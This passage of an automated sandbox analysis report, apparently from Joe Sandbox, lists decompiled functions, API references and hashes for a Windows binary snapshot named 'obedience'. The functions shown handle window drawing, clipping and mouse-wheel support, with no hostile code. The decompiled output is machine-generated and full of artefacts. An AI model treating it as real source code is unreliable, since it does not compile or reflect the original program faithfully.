					_push(0x42ae2e);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}





























      0x0042ac18
      0x0042ac19
      0x0042ac1b
      0x0042ac21
      0x0042ac23
      0x0042ac26
      0x0042ac28
      0x0042ac2b
      0x0042ac34
      0x0042ac3b
      0x0042ac42
      0x0042ac45
      0x0042ac49
      0x0042ac4e
      0x0042ac50
      0x0042ac52
      0x0042ac56
      0x0042ac59
      0x0042ac5a
      0x0042ac5f
      0x0042ac68
      0x0042ac69
      0x0042ac6e
      0x0042ac6e
      0x0042ac72
      0x0042ac77
      0x0042ac7a
      0x0042ac7b
      0x0042ac80
      0x0042ac81
      0x0042ac86
      0x0042ac8a
      0x0042ac91
      0x0042ac92
      0x0042ac97
      0x0042aca8
      0x0042aca8
      0x0042ac99
      0x0042ac9d
      0x0042aca6
      0x0042acac
      0x00000000
      0x00000000
      0x00000000
      0x0042aca6
      0x0042acb0
      0x0042acf3
      0x0042ad00
      0x0042ad00
      0x0042acb2
      0x0042acbd
      0x0042accb
      0x0042ace3
      0x0042ace3
      0x0042ad07
      0x0042ad08
      0x0042ad0d
      0x0042ad10
      0x0042ad1c
      0x0042ad20
      0x0042ad20
      0x0042ad27
      0x0042ad2c
      0x0042ad32
      0x0042ad40
      0x0042ae29
      0x0042ae30
      0x0042ae33
      0x0042ae36
      0x0042ae3f
      0x0042ae41
      0x0042ae46
      0x0042ae4a
      0x0042ae4d
      0x0042ae4e
      0x00000000
      0x0042ae4e
      0x0042ae53
      0x0042ad46
      0x0042ad48
      0x0042ad4d
      0x0042ad52
      0x0042ad53
      0x0042ad58
      0x0042ad5b
      0x0042ad60
      0x0042ad6a
      0x0042ad7a
      0x0042adb4
      0x0042adb9
      0x0042adbb
      0x0042adbe
      0x0042adc1
      0x0042adca
      0x0042add4
      0x0042add4
      0x0042addd
      0x00000000
      0x0042ade3
      0x0042ade8
      0x0042ade8

      APIs
        • Part of subcall function 0042B1A8: 73BEAC50.USER32(00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B1FE
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B213
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B21D
        • Part of subcall function 0042B1A8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B241
        • Part of subcall function 0042B1A8: 73BEB380.USER32(00000000,00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B24C
      • 73BEB410.GDI32(?,?,000000FF), ref: 0042AC5A
      • 73BEB150.GDI32(?,?,?,000000FF), ref: 0042AC69
      • 73BEAD70.GDI32(?,0000000C), ref: 0042AC7B
      • 73BEAD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0042AC8A
      • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042ACBD
      • SetStretchBltMode.GDI32(?,00000004), ref: 0042ACCB
      • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 0042ACE3
      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0042AD00
      • 73BEA590.GDI32(00000000,00000000,0042ADE9,?,?,0000000E,00000000,?,0000000C), ref: 0042AD60
      • SelectObject.GDI32(?,?), ref: 0042AD75
      • SelectObject.GDI32(?,00000000), ref: 0042ADD4
      • DeleteDC.GDI32(00000000), ref: 0042ADE3
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
      • String ID:
      • API String ID: 2051775979-0
      • Opcode ID: 2153924e24b22a56ac1719e09d13ab1c4a78aa3ddfe25e82f58c32ba98b6ed15
      • Instruction ID: 629c67936347ef5ad9bcc2e9d2771490413ab9b282883e3b01fe6ec5c36d71af
      • Opcode Fuzzy Hash: 2153924e24b22a56ac1719e09d13ab1c4a78aa3ddfe25e82f58c32ba98b6ed15
      • Instruction Fuzzy Hash: CC717875B04215AFCB10DFA9D985F5EBBF8AF08304F51846AB908E7282C638ED10CB55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00426F08 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
      Download Yara Rule
      C-Code - Quality: 51%
      			E00426F08(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00407280();
				_v28 = __eax;
				_push(0);
				L00407280();
				_v32 = __eax;
				_push(_t87);
				_push(0x427056);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00407658();
					_v24 = _t37;
					if(_v24 == 0) {
						E00426E50(__ecx);
					}
					_push(_t87);
					_push(0x426fc5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00407278();
					_v20 = _t41;
					if(_v20 == 0) {
						E00426E50(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x426fcc);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L004078C0();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00407268();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x42705d);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























      0x00426f09
      0x00426f0b
      0x00426f16
      0x00426f17
      0x00426f18
      0x00426f1a
      0x00426f1d
      0x00426f1f
      0x00426f24
      0x00426f27
      0x00426f29
      0x00426f2e
      0x00426f33
      0x00426f34
      0x00426f39
      0x00426f3c
      0x00426f49
      0x00426f50
      0x00426f6a
      0x00426f6c
      0x00426f71
      0x00426f78
      0x00426f7a
      0x00426f7a
      0x00426f81
      0x00426f82
      0x00426f87
      0x00426f8a
      0x00426f90
      0x00426f94
      0x00426f95
      0x00426f98
      0x00426f99
      0x00426f9e
      0x00426fa5
      0x00426fa7
      0x00426fa7
      0x00426fae
      0x00426fb1
      0x00426fb4
      0x00426fb9
      0x00426fbc
      0x00426fbd
      0x00426fbf
      0x00426fc4
      0x00426f52
      0x00426f52
      0x00426f54
      0x00426f56
      0x00426f5b
      0x00426f5c
      0x00426f5f
      0x00426f60
      0x00426f65
      0x00426fd0
      0x00426fdf
      0x00426fee
      0x00427015
      0x0042701c
      0x00427023
      0x00427023
      0x0042702a
      0x00427031
      0x00427031
      0x0042702a
      0x00427038
      0x0042703b
      0x0042703e
      0x00427047
      0x00427055
      0x00427055

      APIs
      • 73BEA590.GDI32(00000000), ref: 00426F1F
      • 73BEA590.GDI32(00000000,00000000), ref: 00426F29
      • GetObjectA.GDI32(?,00000018,?), ref: 00426F49
      • 73BEA410.GDI32(?,?,00000001,00000001,00000000,00000000,00427056,?,00000000,00000000), ref: 00426F60
      • 73BEAC50.USER32(00000000,00000000,00427056,?,00000000,00000000), ref: 00426F6C
      • 73BEA520.GDI32(00000000,?,?,00000000,00426FC5,?,00000000,00000000,00427056,?,00000000,00000000), ref: 00426F99
      • 73BEB380.USER32(00000000,00000000,00426FCC,00000000,00426FC5,?,00000000,00000000,00427056,?,00000000,00000000), ref: 00426FBF
      • SelectObject.GDI32(?,?), ref: 00426FDA
      • SelectObject.GDI32(?,00000000), ref: 00426FE9
      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00427015
      • SelectObject.GDI32(?,00000000), ref: 00427023
      • SelectObject.GDI32(?,00000000), ref: 00427031
      • DeleteDC.GDI32(?), ref: 00427047
      • DeleteDC.GDI32(?), ref: 00427050
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$Select$A590Delete$A410A520B380Stretch
      • String ID:
      • API String ID: 956127455-0
      • Opcode ID: f9c81fb34e2f4741f8cd8aff4a8ff08aac220c643414f968572fb8cca271ea75
      • Instruction ID: 4de25d68d9a0aa1b1a6b9f5be952b23dbda794e73a386f216163f357df0946aa
      • Opcode Fuzzy Hash: f9c81fb34e2f4741f8cd8aff4a8ff08aac220c643414f968572fb8cca271ea75
      • Instruction Fuzzy Hash: 0D413E71E08219AFDB50EBE9DD42FAFB7BCEB09704F51046AF604F7280C67969008765
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044BFB0 Relevance: 19.7, APIs: 13, Instructions: 224COMMON
      Download Yara Rule
      C-Code - Quality: 55%
      			E0044BFB0(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E0044B158(_v8);
					_push(_t120);
					L00407768();
					_v16 = _t120;
					_push(_t237);
					_push(0x44c216);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E0044B158(_v8),  &_v32);
					GetWindowRect(E0044B158(_v8),  &_v48);
					MapWindowPoints(0, E0044B158(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E0044B158(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x48f6b0; // 0x490904
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x48f6b0; // 0x490904
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x48eca4 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x48ecb4 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x48ecc4 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x48ecd4 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0042632C( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x44c21d);
					_push(_v16);
					_t171 = E0044B158(_v8);
					_push(_t171);
					L004078C0();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E00430EB0(E00430DA8());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E004314F8(E00430DA8(), 0, _v8);
						}
					}
					return _t205;
				}
			}




















      0x0044bfb1
      0x0044bfb3
      0x0044bfb9
      0x0044bfbc
      0x0044bfc9
      0x0044bfde
      0x0044bfe3
      0x0044bfe4
      0x0044bfe9
      0x0044bfee
      0x0044bfef
      0x0044bff4
      0x0044bff7
      0x0044c007
      0x0044c019
      0x0044c02f
      0x0044c044
      0x0044c05d
      0x0044c068
      0x0044c069
      0x0044c06a
      0x0044c06b
      0x0044c07b
      0x0044c086
      0x0044c087
      0x0044c088
      0x0044c089
      0x0044c094
      0x0044c09a
      0x0044c0a6
      0x0044c0ab
      0x0044c0ab
      0x0044c0bb
      0x0044c0c0
      0x0044c0c0
      0x0044c0d6
      0x0044c0e2
      0x0044c0e4
      0x0044c0e4
      0x0044c0f1
      0x0044c0f3
      0x0044c0f3
      0x0044c100
      0x0044c102
      0x0044c102
      0x0044c10b
      0x0044c10f
      0x0044c118
      0x0044c118
      0x0044c125
      0x0044c127
      0x0044c127
      0x0044c130
      0x0044c134
      0x0044c13d
      0x0044c13d
      0x0044c19d
      0x0044c19d
      0x0044c1b6
      0x0044c1c1
      0x0044c1c2
      0x0044c1c3
      0x0044c1c4
      0x0044c1d5
      0x0044c1f1
      0x0044c1f8
      0x0044c1fb
      0x0044c1fe
      0x0044c206
      0x0044c20a
      0x0044c20f
      0x0044c210
      0x0044c215
      0x0044c21d
      0x0044c225
      0x0044c22d
      0x0044c234
      0x0044c236
      0x0044c23d
      0x0044c249
      0x0044c249
      0x0044c23d
      0x0044c254
      0x0044c254

      APIs
      • 73BEB080.USER32(00000000), ref: 0044BFE4
      • GetClientRect.USER32(00000000,?), ref: 0044C007
      • GetWindowRect.USER32 ref: 0044C019
      • MapWindowPoints.USER32 ref: 0044C02F
      • OffsetRect.USER32(?,?,?), ref: 0044C044
      • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0044C216), ref: 0044C05D
      • InflateRect.USER32(?,00000000,00000000), ref: 0044C07B
      • GetWindowLongA.USER32 ref: 0044C0D1
      • DrawEdge.USER32(?,?,00000000,00000008), ref: 0044C19D
      • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0044C1B6
      • OffsetRect.USER32(?,?,?), ref: 0044C1D5
      • FillRect.USER32 ref: 0044C1F1
      • 73BEB380.USER32(00000000,?,0044C21D,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0044C210
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
      • String ID:
      • API String ID: 156109915-0
      • Opcode ID: 7d2a0a7792a1443939760a1ee51a991a611a6696da56f832f9267a94d7673c00
      • Instruction ID: af4b58efa51be27f327ece3e551d57c4b3afae2afa13afeed174249681c73289
      • Opcode Fuzzy Hash: 7d2a0a7792a1443939760a1ee51a991a611a6696da56f832f9267a94d7673c00
      • Instruction Fuzzy Hash: 1B910771E04148AFDB41DBA9C885EEEB7F9AF09304F1444A6F914F7252C779AE04CB64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00407B7C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00407B7C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








      0x00407b83
      0x00407b85
      0x00407b87
      0x00407b99
      0x00407ba8
      0x00407bb4
      0x00407bc0
      0x00407bc5
      0x00407be4
      0x00407bcb
      0x00407bdb
      0x00407bdb
      0x00407be9
      0x00407c06
      0x00407bef
      0x00407bff
      0x00407bff
      0x00407c13

      APIs
      • FindWindowA.USER32 ref: 00407B94
      • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00407BA0
      • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00407BAF
      • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00407BBB
      • SendMessageA.USER32 ref: 00407BD3
      • SendMessageA.USER32 ref: 00407BF7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ClipboardFormatRegister$MessageSend$FindWindow
      • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
      • API String ID: 1416857345-3736581797
      • Opcode ID: 6508cf304c44e04ad120275376b86e2ab663c874d1c8dc48a162c889ec399333
      • Instruction ID: 48c165740c3543a2106c64c8a974308a4dad1d38a08fed59214040162a8c295a
      • Opcode Fuzzy Hash: 6508cf304c44e04ad120275376b86e2ab663c874d1c8dc48a162c889ec399333
      • Instruction Fuzzy Hash: A4114F71A4C301AFF311AF55CC41B6AB7A8EF45714F20843AB940AB3C0E6B87D40C7AA
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004314F8 Relevance: 18.1, APIs: 12, Instructions: 142COMMON
      Download Yara Rule
      C-Code - Quality: 57%
      			E004314F8(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E0044B158(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E0044B158(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E0044B158(_v8);
					_push(_t55);
					L00407768();
					_v12 = _t55;
					_push(_t120);
					_push(0x431653);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E0044B158(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00418618(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00431018( &_v56, 2);
					E00430F6C(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x43165a);
					_push(_v12);
					_t74 = E0044B158(_v8);
					_push(_t74);
					L004078C0();
					return _t74;
				}
			}






















      0x004314f9
      0x004314fb
      0x00431501
      0x00431503
      0x00431506
      0x00431513
      0x0043151b
      0x00431660
      0x00431521
      0x0043152e
      0x00431543
      0x0043154b
      0x00431550
      0x00431551
      0x00431556
      0x0043155b
      0x0043155c
      0x00431561
      0x00431564
      0x0043156e
      0x0043156f
      0x00431570
      0x00431571
      0x00431572
      0x00431575
      0x00431582
      0x0043158c
      0x00431597
      0x004315a0
      0x004315af
      0x004315c9
      0x004315d5
      0x004315d6
      0x004315d7
      0x004315d8
      0x004315d9
      0x004315ea
      0x004315ea
      0x0043158c
      0x0043160f
      0x0043161b
      0x0043162e
      0x00431635
      0x00431638
      0x0043163b
      0x00431643
      0x00431647
      0x0043164c
      0x0043164d
      0x00431652
      0x00431652

      APIs
      • GetWindowLongA.USER32 ref: 00431513
      • GetWindowRect.USER32 ref: 0043152E
      • OffsetRect.USER32(?,?,?), ref: 00431543
      • 73BEB080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00431551
      • GetWindowLongA.USER32 ref: 00431582
      • GetSystemMetrics.USER32 ref: 00431597
      • GetSystemMetrics.USER32 ref: 004315A0
      • InflateRect.USER32(?,000000FE,000000FE), ref: 004315AF
      • GetSysColorBrush.USER32(0000000F), ref: 004315DC
      • FillRect.USER32 ref: 004315EA
      • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00431653,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043160F
      • 73BEB380.USER32(00000000,?,0043165A,?,?,00000000,00431653,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043164D
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
      • String ID:
      • API String ID: 3936689491-0
      • Opcode ID: d4119b3a32b5947f2531282d6dd8e0b23464a3c5ccd1f1e3468c08536ce62408
      • Instruction ID: 44e5fce61399ba1f9cf41d9bb894a17272d639a42f1f056529d16ae1c83c0070
      • Opcode Fuzzy Hash: d4119b3a32b5947f2531282d6dd8e0b23464a3c5ccd1f1e3468c08536ce62408
      • Instruction Fuzzy Hash: EF413C71E04108ABDB01EBE9CD86EDFB7BDEF49354F104526F904F7291CA38AA0487A5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042DAE4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
      Download Yara Rule
      C-Code - Quality: 88%
      			E0042DAE4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
